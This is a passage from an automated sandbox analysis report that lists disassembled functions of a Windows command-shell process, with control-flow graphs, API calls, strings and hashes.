                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction ID: a5e03e501005a527bfbbdda5d1ec8130c2024aa10fc9089661f826422e029ff3
                                                                                                                                                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 56C14263A08A46D6EB14DF61A8543B977A0FF89B91F448134D90EC77A1DF3EA44DC30A
                                                                                                                                                                        Function 00007FF6E9433C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 732 7ff6e9433c24-7ff6e9433c61 733 7ff6e9433c67-7ff6e9433c99 call 7ff6e942af14 call 7ff6e942ca40 732->733 734 7ff6e943ec5a-7ff6e943ec5f 732->734 743 7ff6e943ec97-7ff6e943eca1 call 7ff6e943855c 733->743 744 7ff6e9433c9f-7ff6e9433cb2 call 7ff6e942b900 733->744 734->733 736 7ff6e943ec65-7ff6e943ec6a 734->736 738 7ff6e943412e-7ff6e943415b call 7ff6e9438f80 736->738 744->743 749 7ff6e9433cb8-7ff6e9433cbc 744->749 750 7ff6e9433cbf-7ff6e9433cc7 749->750 750->750 751 7ff6e9433cc9-7ff6e9433ccd 750->751 752 7ff6e9433cd2-7ff6e9433cd8 751->752 753 7ff6e9433cda-7ff6e9433cdf 752->753 754 7ff6e9433ce5-7ff6e9433d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6e9433faa-7ff6e9433fb3 753->755 756 7ff6e9433fb8 754->756 757 7ff6e9433d68-7ff6e9433d6c 754->757 755->752 759 7ff6e9433fc6-7ff6e9433fec GetLastError call 7ff6e943855c call 7ff6e943a5d6 756->759 757->756 758 7ff6e9433d72-7ff6e9433dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6e9433dd3-7ff6e9433ddd 758->760 762 7ff6e9433ff1-7ff6e9434007 call 7ff6e943855c _local_unwind 759->762 760->762 763 7ff6e9433de3-7ff6e9433dfb 760->763 773 7ff6e943400c-7ff6e9434022 GetLastError 762->773 765 7ff6e9433e01-7ff6e9433e11 763->765 766 7ff6e94340fe-7ff6e9434119 call 7ff6e943855c _local_unwind 763->766 765->766 769 7ff6e9433e17-7ff6e9433e28 765->769 778 7ff6e943411a-7ff6e943412c call 7ff6e942ff70 call 7ff6e943855c 766->778 772 7ff6e9433e2c-7ff6e9433e34 769->772 772->772 775 7ff6e9433e36-7ff6e9433e3f 772->775 776 7ff6e9434028-7ff6e943402b 773->776 777 7ff6e9433e95-7ff6e9433e9c 773->777 779 7ff6e9433e42-7ff6e9433e55 775->779 776->777 780 7ff6e9434031-7ff6e9434047 call 7ff6e943855c _local_unwind 776->780 781 7ff6e9433e9e-7ff6e9433ec2 call 7ff6e9432978 777->781 782 7ff6e9433ecf-7ff6e9433ed3 777->782 778->738 784 7ff6e9433e66-7ff6e9433e8f GetFileAttributesW 779->784 785 7ff6e9433e57-7ff6e9433e60 779->785 804 7ff6e943404c-7ff6e9434062 call 7ff6e943855c _local_unwind 780->804 798 7ff6e9433ec7-7ff6e9433ec9 781->798 788 7ff6e9433f08-7ff6e9433f0b 782->788 789 7ff6e9433ed5-7ff6e9433ef7 GetFileAttributesW 782->789 784->773 784->777 785->784 796 7ff6e9433f9d-7ff6e9433fa5 785->796 794 7ff6e9433f0d-7ff6e9433f11 788->794 795 7ff6e9433f1e-7ff6e9433f40 SetCurrentDirectoryW 788->795 791 7ff6e9434067-7ff6e9434098 GetLastError call 7ff6e943855c _local_unwind 789->791 792 7ff6e9433efd-7ff6e9433f02 789->792 799 7ff6e943409d-7ff6e94340b3 call 7ff6e943855c _local_unwind 791->799 792->788 792->799 801 7ff6e9433f46-7ff6e9433f69 call 7ff6e943498c 794->801 802 7ff6e9433f13-7ff6e9433f1c 794->802 795->801 803 7ff6e94340b8-7ff6e94340de GetLastError call 7ff6e943855c _local_unwind 795->803 796->779 798->782 798->804 799->803 815 7ff6e94340e3-7ff6e94340f9 call 7ff6e943855c _local_unwind 801->815 816 7ff6e9433f6f-7ff6e9433f98 call 7ff6e943417c 801->816 802->795 802->801 803->815 804->791 815->766 816->778
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 1809961153-336475711
                                                                                                                                                                        • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                                                                                                                        • Instruction ID: 7e374998180753811e0c53a659e59f4b4d86c053be5e0ee11f8edd63c92f8fa0
                                                                                                                                                                        • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                                                                                                                        • Instruction Fuzzy Hash: C0D12A23609B85D2EA64DF35E4583AAB7A1FF84B40F844135DA4E837A4DF3DE548CB05
                                                                                                                                                                        Function 00007FF6E9432394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 914 7ff6e9432394-7ff6e9432416 memset call 7ff6e942ca40 917 7ff6e943241c-7ff6e9432453 GetModuleFileNameW call 7ff6e943081c 914->917 918 7ff6e943e0d2-7ff6e943e0da call 7ff6e9434c1c 914->918 923 7ff6e9432459-7ff6e9432468 call 7ff6e943081c 917->923 924 7ff6e943e0db-7ff6e943e0ee call 7ff6e943498c 917->924 918->924 929 7ff6e943246e-7ff6e943247d call 7ff6e943081c 923->929 930 7ff6e943e0f4-7ff6e943e107 call 7ff6e943498c 923->930 924->930 935 7ff6e9432516-7ff6e9432529 call 7ff6e943498c 929->935 936 7ff6e9432483-7ff6e9432492 call 7ff6e943081c 929->936 937 7ff6e943e10d-7ff6e943e123 930->937 935->936 936->937 947 7ff6e9432498-7ff6e94324a7 call 7ff6e943081c 936->947 940 7ff6e943e13f-7ff6e943e17a _wcsupr 937->940 941 7ff6e943e125-7ff6e943e139 wcschr 937->941 945 7ff6e943e17c-7ff6e943e17f 940->945 946 7ff6e943e181-7ff6e943e199 wcsrchr 940->946 941->940 944 7ff6e943e27c 941->944 949 7ff6e943e283-7ff6e943e29b call 7ff6e943498c 944->949 948 7ff6e943e19c 945->948 946->948 956 7ff6e94324ad-7ff6e94324c5 call 7ff6e9433c24 947->956 957 7ff6e943e2a1-7ff6e943e2c3 _wcsicmp 947->957 951 7ff6e943e1a0-7ff6e943e1a7 948->951 949->957 951->951 954 7ff6e943e1a9-7ff6e943e1bb 951->954 958 7ff6e943e1c1-7ff6e943e1e6 954->958 959 7ff6e943e264-7ff6e943e277 call 7ff6e9431300 954->959 964 7ff6e94324ca-7ff6e94324db 956->964 962 7ff6e943e1e8-7ff6e943e1f1 958->962 963 7ff6e943e21a 958->963 959->944 968 7ff6e943e201-7ff6e943e210 962->968 969 7ff6e943e1f3-7ff6e943e1f6 962->969 967 7ff6e943e21d-7ff6e943e21f 963->967 965 7ff6e94324e9-7ff6e9432514 call 7ff6e9438f80 964->965 966 7ff6e94324dd-7ff6e94324e4 ??_V@YAXPEAX@Z 964->966 966->965 967->949 971 7ff6e943e221-7ff6e943e228 967->971 968->963 973 7ff6e943e212-7ff6e943e218 968->973 969->968 972 7ff6e943e1f8-7ff6e943e1ff 969->972 975 7ff6e943e22a-7ff6e943e231 971->975 976 7ff6e943e254-7ff6e943e262 971->976 972->968 972->969 973->967 977 7ff6e943e234-7ff6e943e237 975->977 976->944 977->976 978 7ff6e943e239-7ff6e943e242 977->978 978->976 979 7ff6e943e244-7ff6e943e252 978->979 979->976 979->977
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                        • API String ID: 2622545777-4197029667
                                                                                                                                                                        • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                                                                                                                        • Instruction ID: 6466884da9807152d6b97d5d93e782d0e324c227afa02ad116da6a939ad33ced
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                                                                                                                        • Instruction Fuzzy Hash: EF916C63A0A686D6EF25CF71D8583B963A0FF58B84F444135CA0E87795DE3EE508C706
                                                                                                                                                                        Function 00007FF6E9430580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                        • API String ID: 1606018815-3025314500
                                                                                                                                                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                        • Instruction ID: 8ec1ff90e9fb9a4322e3816c0ad23d2cfe31b8354a8088ccf55bb780f563b8a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                        • Instruction Fuzzy Hash: AC419DB6A19702CBE7159F64E8553787BA0BF9A751F449235C90EC2361DF3EA40CC70A
                                                                                                                                                                        Function 00007FF6E942C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 992 7ff6e942c620-7ff6e942c66f GetConsoleTitleW 993 7ff6e942c675-7ff6e942c687 call 7ff6e942af14 992->993 994 7ff6e943c5f2 992->994 999 7ff6e942c689 993->999 1000 7ff6e942c68e-7ff6e942c69d call 7ff6e942ca40 993->1000 996 7ff6e943c5fc-7ff6e943c60c GetLastError 994->996 998 7ff6e943c5e3 call 7ff6e9423278 996->998 1004 7ff6e943c5e8-7ff6e943c5ed call 7ff6e943855c 998->1004 999->1000 1000->1004 1005 7ff6e942c6a3-7ff6e942c6ac 1000->1005 1004->994 1007 7ff6e942c954-7ff6e942c95e call 7ff6e943291c 1005->1007 1008 7ff6e942c6b2-7ff6e942c6c5 call 7ff6e942b9c0 1005->1008 1013 7ff6e943c5de-7ff6e943c5e0 1007->1013 1014 7ff6e942c964-7ff6e942c972 call 7ff6e94289c0 1007->1014 1015 7ff6e942c6cb-7ff6e942c6ce 1008->1015 1016 7ff6e942c9b5-7ff6e942c9b8 call 7ff6e9435c6c 1008->1016 1013->998 1014->996 1024 7ff6e942c978-7ff6e942c99a towupper 1014->1024 1015->1004 1018 7ff6e942c6d4-7ff6e942c6e9 1015->1018 1023 7ff6e942c9bd-7ff6e942c9c9 call 7ff6e943855c 1016->1023 1021 7ff6e943c616-7ff6e943c620 call 7ff6e943855c 1018->1021 1022 7ff6e942c6ef-7ff6e942c6fa 1018->1022 1025 7ff6e943c627 1021->1025 1022->1025 1026 7ff6e942c700-7ff6e942c713 1022->1026 1039 7ff6e942c9d0-7ff6e942c9d7 1023->1039 1029 7ff6e942c9a0-7ff6e942c9a9 1024->1029 1031 7ff6e943c631 1025->1031 1030 7ff6e942c719-7ff6e942c72c 1026->1030 1026->1031 1029->1029 1034 7ff6e942c9ab-7ff6e942c9af 1029->1034 1035 7ff6e943c63b 1030->1035 1036 7ff6e942c732-7ff6e942c747 call 7ff6e942d3f0 1030->1036 1031->1035 1034->1016 1037 7ff6e943c60e-7ff6e943c611 call 7ff6e944ec14 1034->1037 1042 7ff6e943c645 1035->1042 1046 7ff6e942c8ac-7ff6e942c8af 1036->1046 1047 7ff6e942c74d-7ff6e942c750 1036->1047 1037->1021 1040 7ff6e942c9dd-7ff6e943c6da SetConsoleTitleW 1039->1040 1041 7ff6e942c872-7ff6e942c8aa call 7ff6e943855c call 7ff6e9438f80 1039->1041 1040->1041 1051 7ff6e943c64e-7ff6e943c651 1042->1051 1046->1047 1050 7ff6e942c8b5-7ff6e942c8d3 wcsncmp 1046->1050 1052 7ff6e942c76a-7ff6e942c76d 1047->1052 1053 7ff6e942c752-7ff6e942c764 call 7ff6e942bd38 1047->1053 1050->1052 1058 7ff6e942c8d9 1050->1058 1059 7ff6e943c657-7ff6e943c65b 1051->1059 1060 7ff6e942c80d-7ff6e942c811 1051->1060 1056 7ff6e942c840-7ff6e942c84b call 7ff6e942cb40 1052->1056 1057 7ff6e942c773-7ff6e942c77a 1052->1057 1053->1004 1053->1052 1077 7ff6e942c856-7ff6e942c86c 1056->1077 1078 7ff6e942c84d-7ff6e942c855 call 7ff6e942cad4 1056->1078 1065 7ff6e942c780-7ff6e942c784 1057->1065 1058->1047 1059->1060 1061 7ff6e942c817-7ff6e942c81b 1060->1061 1062 7ff6e942c9e2-7ff6e942c9e7 1060->1062 1067 7ff6e942ca1b-7ff6e942ca1f 1061->1067 1068 7ff6e942c821 1061->1068 1062->1061 1069 7ff6e942c9ed-7ff6e942c9f7 call 7ff6e943291c 1062->1069 1070 7ff6e942c83d 1065->1070 1071 7ff6e942c78a-7ff6e942c7a4 wcschr 1065->1071 1067->1068 1079 7ff6e942ca25-7ff6e943c6b3 call 7ff6e9423278 1067->1079 1073 7ff6e942c824-7ff6e942c82d 1068->1073 1086 7ff6e942c9fd-7ff6e942ca00 1069->1086 1087 7ff6e943c684-7ff6e943c698 call 7ff6e9423278 1069->1087 1070->1056 1075 7ff6e942c7aa-7ff6e942c7ad 1071->1075 1076 7ff6e942c8de-7ff6e942c8f7 1071->1076 1073->1073 1080 7ff6e942c82f-7ff6e942c837 1073->1080 1082 7ff6e942c7b0-7ff6e942c7b8 1075->1082 1083 7ff6e942c900-7ff6e942c908 1076->1083 1077->1039 1077->1041 1078->1077 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6e942c7ba-7ff6e942c7c7 1082->1088 1083->1083 1089 7ff6e942c90a-7ff6e942c915 1083->1089 1086->1061 1093 7ff6e942ca06-7ff6e942ca10 call 7ff6e94289c0 1086->1093 1087->1004 1088->1051 1094 7ff6e942c7cd-7ff6e942c7db 1088->1094 1095 7ff6e942c917 1089->1095 1096 7ff6e942c93a-7ff6e942c944 1089->1096 1093->1061 1111 7ff6e942ca16-7ff6e943c67f GetLastError call 7ff6e9423278 1093->1111 1100 7ff6e942c7e0-7ff6e942c7e7 1094->1100 1101 7ff6e942c920-7ff6e942c928 1095->1101 1103 7ff6e942ca2a-7ff6e942ca2f call 7ff6e9439158 1096->1103 1104 7ff6e942c94a 1096->1104 1106 7ff6e942c7e9-7ff6e942c7f1 1100->1106 1107 7ff6e942c800-7ff6e942c803 1100->1107 1108 7ff6e942c92a-7ff6e942c92f 1101->1108 1109 7ff6e942c932-7ff6e942c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6e942c7f3-7ff6e942c7fe 1106->1112 1107->1042 1113 7ff6e942c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1060
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleTitlewcschr
                                                                                                                                                                        • String ID: /$:
                                                                                                                                                                        • API String ID: 2364928044-4222935259
                                                                                                                                                                        • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                                                                        • Instruction ID: 3b65508ac54dbcb4e04fa3d5721c1d3f1109bae1e62d701170a327c3cbfcd00e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BC1BE63A18642C1EB249F25D418BB962A1FF91B92F449171E91EC72D1EF3EE44CC30A
                                                                                                                                                                        Function 00007FF6E9438D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1171 7ff6e9438d80-7ff6e9438da2 1172 7ff6e9438da4-7ff6e9438daf 1171->1172 1173 7ff6e9438dcc 1172->1173 1174 7ff6e9438db1-7ff6e9438db4 1172->1174 1177 7ff6e9438dd1-7ff6e9438dd9 1173->1177 1175 7ff6e9438db6-7ff6e9438dbd 1174->1175 1176 7ff6e9438dbf-7ff6e9438dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff6e9438de7-7ff6e9438def 1177->1178 1179 7ff6e9438ddb-7ff6e9438de5 _amsg_exit 1177->1179 1181 7ff6e9438e46 1178->1181 1182 7ff6e9438df1-7ff6e9438e0a 1178->1182 1180 7ff6e9438e4c-7ff6e9438e54 1179->1180 1184 7ff6e9438e56-7ff6e9438e69 _initterm 1180->1184 1185 7ff6e9438e73-7ff6e9438e75 1180->1185 1181->1180 1183 7ff6e9438e0e-7ff6e9438e11 1182->1183 1186 7ff6e9438e38-7ff6e9438e3a 1183->1186 1187 7ff6e9438e13-7ff6e9438e15 1183->1187 1184->1185 1188 7ff6e9438e77-7ff6e9438e79 1185->1188 1189 7ff6e9438e80-7ff6e9438e88 1185->1189 1186->1180 1193 7ff6e9438e3c-7ff6e9438e41 1186->1193 1192 7ff6e9438e17-7ff6e9438e1b 1187->1192 1187->1193 1188->1189 1190 7ff6e9438e8a-7ff6e9438e98 call 7ff6e94394f0 1189->1190 1191 7ff6e9438eb4-7ff6e9438ec8 call 7ff6e94337d8 1189->1191 1190->1191 1201 7ff6e9438e9a-7ff6e9438eaa 1190->1201 1200 7ff6e9438ecd-7ff6e9438eda 1191->1200 1195 7ff6e9438e2d-7ff6e9438e36 1192->1195 1196 7ff6e9438e1d-7ff6e9438e29 1192->1196 1198 7ff6e9438f28-7ff6e9438f3d 1193->1198 1195->1183 1196->1195 1203 7ff6e9438edc-7ff6e9438ede exit 1200->1203 1204 7ff6e9438ee4-7ff6e9438eeb 1200->1204 1201->1191 1203->1204 1205 7ff6e9438ef9 1204->1205 1206 7ff6e9438eed-7ff6e9438ef3 _cexit 1204->1206 1205->1198 1206->1205
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4291973834-0
                                                                                                                                                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                        • Instruction ID: adab6265ae4a29c8c6ccc5543bd00b57ccb5e00530c78f71391e53dde17dff2c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A41E433A08603C2FB51EFB0E8493B9A2A0AF54744F444435D91DC76A0DF7EE888C74A
                                                                                                                                                                        Function 00007FF6E9434A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1207 7ff6e9434a14-7ff6e9434a3e GetEnvironmentStringsW 1208 7ff6e9434a40-7ff6e9434a46 1207->1208 1209 7ff6e9434aae-7ff6e9434ac5 1207->1209 1210 7ff6e9434a48-7ff6e9434a52 1208->1210 1211 7ff6e9434a59-7ff6e9434a8f GetProcessHeap HeapAlloc 1208->1211 1210->1210 1214 7ff6e9434a54-7ff6e9434a57 1210->1214 1212 7ff6e9434a91-7ff6e9434a9a memmove 1211->1212 1213 7ff6e9434a9f-7ff6e9434aa9 FreeEnvironmentStringsW 1211->1213 1212->1213 1213->1209 1214->1210 1214->1211
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                        • memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
